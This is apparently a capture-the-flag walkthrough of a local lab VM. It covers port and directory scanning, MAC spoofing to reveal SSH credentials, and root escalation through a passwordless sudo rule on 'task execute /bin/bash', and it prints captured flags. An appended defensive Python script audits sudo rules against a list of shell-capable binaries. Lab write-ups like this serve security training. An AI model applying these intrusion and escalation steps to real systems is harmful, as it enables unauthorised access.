Hacking practice...

1. Scan ports and services

┌──(root㉿kali)-[/home/ace]
└─# nmap -sC -sV -p- 192.168.56.137
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-29 11:38 CST
Nmap scan report for 192.168.56.137
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 25168d636b75f05955d4b02d758de0e6 (RSA)
| 256 1e29d0f4c595e740302b35f7a3bc3675 (ECDSA)
|_ 256 ccb152b3d7efcd734cfcf6b55177eaf3 (ED25519)
80/tcp open http nginx 1.18.0
| http-robots.txt: 7 disallowed entries
| /admin /secret.txt /uploads/id_rsa /internal.php
|_/internal /cms /user.txt
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0
MAC Address: 08:00:27:17:EB:28 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.30 seconds

2. Visit the web page


Nothing useful here.

3. Directory scan with gobuster

┌──(root㉿kali)-[/home/ace]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.56.137/ -x php,txt,html
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.137/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
2023/07/29 11:42:25 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 31]
/user.txt (Status: 200) [Size: 5]
/admin (Status: 301) [Size: 169] [--> http://192.168.56.137/admin/]
/robots.txt (Status: 200) [Size: 137]
/internal.php (Status: 200) [Size: 82]
/secret.txt (Status: 200) [Size: 17]
Progress: 450467 / 882244 (51.06%)^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2023/07/29 11:47:20 Finished
===============================================================

Let's visit them.


4. Change the MAC address

┌──(root㉿kali)-[/home/ace]
└─# ifconfig eth1 down

┌──(root㉿kali)-[/home/ace]
└─# ifconfig eth1 hw ether 00:00:00:00:00:AF

┌──(root㉿kali)-[/home/ace]
└─# ifconfig eth1 up

┌──(root㉿kali)-[/home/ace]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.181.139 netmask 255.255.255.0 broadcast 192.168.181.255
inet6 fe80::20c:29ff:fe4d:2f0b prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:4d:2f:0b txqueuelen 1000 (Ethernet)
RX packets 45603 bytes 6896380 (6.5 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 43194 bytes 2636881 (2.5 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.127 netmask 255.255.255.0 broadcast 192.168.56.255
inet6 fe80::200:ff:fe00:af prefixlen 64 scopeid 0x20<link>
ether 00:00:00:00:00:af txqueuelen 1000 (Ethernet)
RX packets 561753 bytes 176917710 (168.7 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 549265 bytes 80914874 (77.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 4 bytes 240 (240.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4 bytes 240 (240.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Visit the page again:


Username: bro, password: Zurviv0r1

5. SSH connection

┌──(root㉿kali)-[/home/ace]
└─# ssh bro@192.168.56.137
The authenticity of host '192.168.56.137 (192.168.56.137)' can't be established.
ED25519 key fingerprint is SHA256:LKGaz7vcAZo/hWtEM4N2MzrC3C6Gl5sNO4+P8d7TpV8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.137' (ED25519) to the list of known hosts.
Load key "/root/.ssh/id_rsa": error in libcrypto
bro@192.168.56.137's password:
Linux warrior 5.10.0-11-amd64 #1 SMP Debian 5.10.92-1 (2022-01-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb 8 04:03:20 2022 from 192.168.1.51
bro@warrior:~$ ls
user.txt
bro@warrior:~$ cat user.txt
LcHHbXGHMVhCpQHvqDen
bro@warrior:~$

6. Privilege escalation

bro@warrior:~$ sudo -l
-bash: sudo: command not found
bro@warrior:~$ find / -user root -perm -4000 -print 2>/dev/null
/usr/sbin/sudo
/usr/bin/umount
/usr/bin/chsh
/usr/bin/su
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
bro@warrior:~$

sudo is not on bro's PATH, but the find output shows /usr/sbin/sudo is setuid root, so try calling it by its full path:

bro@warrior:/$ /usr/sbin/sudo -l
Matching Defaults entries for bro on warrior:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bro may run the following commands on warrior:
(root) NOPASSWD: /usr/bin/task

Target: task

task can be exploited directly: its execute subcommand runs whatever command it is given, and under sudo that command runs as root.

bro@warrior:/$ /usr/sbin/sudo task execute /bin/bash
root@warrior:/# cat root.txt
cat: root.txt: No such file or directory
root@warrior:/# ls
bin dev home initrd.img.old lib32 libx32 media opt root sbin sys usr vmlinuz
boot etc initrd.img lib lib64 lost+found mnt proc run srv tmp var vmlinuz.old
root@warrior:/# cd root
root@warrior:~# ls
root.txt
root@warrior:~# cat root.txt
HPiGHMVcDNLlXbHLydMv
root@warrior:~#
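As an added defender-side example (not part of the original writeup): a small Python audit script that parses `sudo -l` output in the format shown above and flags rules like the NOPASSWD task entry. The sample input is constructed to mirror this box, and the list of shell-capable binaries is an assumption of the example.

```python
import re

# Constructed sample mirroring the `sudo -l` output on this box, plus one
# harmless rule so the audit has something to leave alone.
SAMPLE_SUDO_L = """\
Matching Defaults entries for bro on warrior:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User bro may run the following commands on warrior:
    (root) NOPASSWD: /usr/bin/task
    (root) /usr/bin/systemctl restart nginx
"""

# Assumed list: binaries whose sub-commands run arbitrary programs. `task` is
# the one this page abuses (task execute <cmd>); the rest are well-known.
SHELL_CAPABLE = {"task", "vim", "vi", "less", "more", "find", "awk",
                 "python3", "perl", "bash", "sh", "env"}

# "(runas) TAG: TAG: command args" as printed by sudo -l
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")

def parse_rules(text):
    """Return (runas, tags, command) tuples from the 'may run' section."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if m:
            tags = [t.rstrip(":") for t in m.group("tags").split()]
            rules.append((m.group("runas"), tags, m.group("cmd")))
    return rules

def audit(text):
    """Flag root-capable rules that are passwordless, unrestricted, or shell-capable."""
    findings = []
    for runas, tags, cmd in parse_rules(text):
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        reasons = []
        if "NOPASSWD" in tags:
            reasons.append("no password required")
        if binary == "ALL":
            reasons.append("unrestricted command")
        if binary in SHELL_CAPABLE:
            reasons.append(f"{binary} can spawn arbitrary commands")
        if reasons and ("root" in runas or "ALL" in runas):
            findings.append((cmd, reasons))
    return findings
```

Feed it the real `sudo -l` output of each account during a host review; a rule that is both passwordless and shell-capable, like the task entry here, is a one-step path to root.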

over!!!